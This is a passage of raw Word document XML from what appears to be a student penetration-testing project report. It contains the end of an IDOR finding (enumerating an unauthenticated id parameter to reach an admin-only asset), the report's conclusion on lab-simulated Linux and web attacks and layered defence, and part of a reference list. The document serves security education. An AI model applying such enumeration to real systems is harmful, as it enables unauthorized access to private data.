      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="1BD86293"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120318BA" w14:textId="28381773" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="0017505D" w:rsidP="0017505D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="1080"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Access the gallery endpoint without authentication, enumerate the id parameter, and observe that id=74 returns an admin-only asset, demonstrating that the application exposes privileged content without requiring authentication or authorization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="53F4C1B7" w14:textId="77777777" w:rsidTr="00836DE6">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637328E5" w14:textId="6B05A789" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of concept:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="53CD4F7A" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="277"/>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3E8C4A9" w14:textId="23D917EB" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="009E4D57" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI17" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:lang w:val="en-IN"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure A.17 </w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>IDOR in ascii_gallery.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="52C5DCAF" w14:textId="77777777" w:rsidTr="00836DE6">
        <w:trPr>
          <w:trHeight w:val="279"/>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D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="5E1E7D9D" w14:textId="77777777" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="6CF68F32" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="301"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9439" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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p w14:paraId="4FCF3DB3" w14:textId="77777777" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId54" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/639.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4E033AE0" w14:textId="3D6110D3" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0852DBF5" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00815CEC">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480FD2AC" w14:textId="7E5AFE4E" w:rsidR="00F6444F" w:rsidRPr="00D77DFE" w:rsidRDefault="0014156B" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Toc223521153"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SUMMARY AND FINAL CONCLUSION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:r w:rsidR="003C7B6F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4020E3" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this project, the most common cybersecurity attacks on Linux systems and web applications were simulated. The work demonstrates how these attacks can be carried out, which tools are required, and why they are used. It also explains how to protect against these attacks and identifies the vulnerable code or misconfigurations that enable them. For each attack, screenshots were provided to illustrate the risk to a specific system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A6953" w14:textId="0439A9BA" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All components, including Linux systems, web applications, and servers, were configured manually without using pre-built vulnerable machines such as Metasploitable or other ISO images. A network segmentation topology was designed consisting of four</w:t>
      </w:r>
      <w:r w:rsidR="00EC7EE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, including one completely isolated</w:t>
      </w:r>
      <w:r w:rsidR="00D105E7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Despite being isolated, this</w:t>
      </w:r>
      <w:r w:rsidR="00EC7EE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was still vulnerable and could be exploited, which demonstrates that a single layer of protection, such as network segmentation, is not sufficient. Effective security requires multiple layers, not only firewalls or intrusion detection systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE76C39" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The project also demonstrates how pivoting techniques can be used to move through the network. The work can be further improved by adding additional security layers and showing how a SIEM system can detect attacks before they occur. Another improvement would be the implementation of input whitelisting in web applications to make exploitation more difficult. By adding new security layers and repeating the same attacks, the effectiveness of these protections could be evaluated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F7CBC" w14:textId="05AE38E2" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>During this project, many challenges were encountered, particularly related to system configuration, development of the custom web application in Tomcat and PHP, subnet design, and firewall configuration. Configuring the isolated</w:t>
      </w:r>
      <w:r w:rsidR="00D105E7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was especially challenging, as it could only be accessed from </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ubnet 3 and had to be configured exclusively from that subnet from the very beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B8898" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="00AC583C">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B57BC6" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="00AC583C">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C1EF96" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="00AC583C">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEABC98" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00AC583C">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D0400D" w14:textId="62780E1A" w:rsidR="009E4D57" w:rsidRPr="00D77DFE" w:rsidRDefault="00AC583C" w:rsidP="006B5228">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_Toc223521154"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="199" w:name="resource1"/>
    <w:p w14:paraId="3F254D3E" w14:textId="0F7F5DC4" w:rsidR="00280CF1" w:rsidRPr="00D77DFE" w:rsidRDefault="00280CF1" w:rsidP="00280CF1">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 Cyberattack Statistics: What the Numbers Reveal About Today's Threats [Online]. ZeroThreat.ai [access 23 December 2025]. Available: https:\\zerothreat.ai\\blog\\cyberattack-statistics"</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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cyberattack Statistics: What the Numbers Reveal About Today's Threats</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. ZeroThreat.ai [access 23 December 2025]. Available: https://zerothreat.ai/blog/cyberattack-statistics</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="199"/>
    <w:p w14:paraId="30E66B94" w14:textId="78B3287F" w:rsidR="00C87849" w:rsidRPr="00D77DFE" w:rsidRDefault="00280CF1" w:rsidP="00272961">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="200" w:name="resource2"/>
      <w:r w:rsidR="00C87849"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 SAP NetWeaver 0-Day Vulnerability Actively Exploited to Deploy Webshells [Online]. Cyberpress.org [access 28 December 2025]. Available: https:\\cyberpress.org\\sap-netweaver-0-day-vulnerability\\"</w:instrText>
      </w:r>
      <w:r w:rsidR="00C87849" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00C87849" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C87849" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidR="00C87849" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SAP NetWeaver 0-Day Vulnerability Actively Exploited to Deploy Webshells</w:t>
      </w:r>
      <w:r w:rsidR="00C87849" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C87849" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online]. Cyberpress.org [access 28 December 2025]. Available: https://cyberpress.org/sap-netweaver-0-day-vulnerability/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="200"/>
    <w:p w14:paraId="308DCC05" w14:textId="50F2CDAD" w:rsidR="006E396A" w:rsidRPr="00D77DFE" w:rsidRDefault="00C87849" w:rsidP="00272961">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="201" w:name="resource3"/>
      <w:r w:rsidR="00280CF1" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
